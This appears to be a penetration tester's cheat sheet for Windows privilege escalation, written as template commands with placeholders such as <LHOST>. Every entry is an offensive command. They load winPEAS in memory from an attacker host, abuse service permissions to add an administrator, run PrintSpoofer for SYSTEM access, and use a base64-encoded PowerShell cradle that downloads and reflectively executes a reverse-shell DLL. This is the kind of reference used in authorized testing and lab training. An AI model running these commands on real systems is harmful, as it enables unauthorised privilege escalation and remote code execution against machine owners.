% winpeas

# winpeas memory
<VAR>wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "http://<LHOST>/win/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

# service permissions
sc qc <SERVICE_NAME>
sc config "<SERVICE_NAME>" obj= "NT AUTHORITY\SYSTEM" password= "" start= demand binPath= "net localgroup Administrators <DOMAIN>\<USER> /add"
sc stop "<SERVICE_NAME>"
sc start "<SERVICE_NAME>"
- log off then log back on

# itm4n/PrintSpoofer
PrintSpoofer.exe -i -c powershell.exe

# NukingDragons/PrintSpoofer in memory
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$data = (New-Object System.Net.WebClient).DownloadData("http://<LHOST>/runner.dll");$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType("rev.Program");$method = $class.GetMethod("Main");$method.Invoke(0, $null)'))
[System.Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('http://<LHOST>/PrintSpooferNet.exe'))
[PrintSpooferNet.Program]::Main(@("any_pipe_name", "powershell -enc <base64>"))

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
$ VAR: echo '$'
